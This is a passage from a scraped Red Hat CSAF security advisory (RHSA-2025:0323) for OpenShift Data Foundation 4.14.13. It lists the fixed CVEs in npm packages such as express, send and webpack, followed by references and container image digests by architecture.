"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2025:0323
Vulnerability from csaf_redhat
Published
2025-01-15 01:19
Modified
2025-04-10 00:23
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.14.13 Bug Fix Update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.14.13 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an S3-compatible API.
Security Fix(es) from Bugzilla:
* tough-cookie: prototype pollution in cookie memstore (CVE-2023-26136)
* css-tools: Improper Input Validation causes Denial of Service via Regular Expression (CVE-2023-26364)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.14.13 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an S3-compatible API.\n\nSecurity Fix(es) from Bugzilla:\n\n* tough-cookie: prototype pollution in cookie memstore (CVE-2023-26136)\n\n* css-tools: Improper Input Validation causes Denial of Service via Regular Expression (CVE-2023-26364)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2025:0323", url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "DFBUGS-923", url: "https://issues.redhat.com/browse/DFBUGS-923", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_0323.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.14.13 Bug Fix Update", tracking: { current_release_date: "2025-04-10T00:23:14+00:00", generator: { date: "2025-04-10T00:23:14+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2025:0323", initial_release_date: "2025-01-15T01:19:29+00:00", revision_history: [ { date: "2025-01-15T01:19:29+00:00", number: "1", summary: "Initial version", }, { date: "2025-01-15T01:19:29+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:23:14+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.14 for RHEL 9", product: { name: "RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.14::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", product_id: "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", product: { name: "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", product_id: "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", product_identification_helper: { purl: "pkg:oci/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-cli-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", product: { name: "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", product_id: "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", product_id: "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", product_id: "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", product_id: "odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", product: { name: "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", product_id: "odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", product: { name: "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", product_id: "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", product_id: "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", product_id: "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.14.13-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", product_id: "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", product: { name: "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", product_id: "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", product_identification_helper: { purl: "pkg:oci/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-cli-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", product_id: "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", product_id: "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", product: { name: "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", product_id: 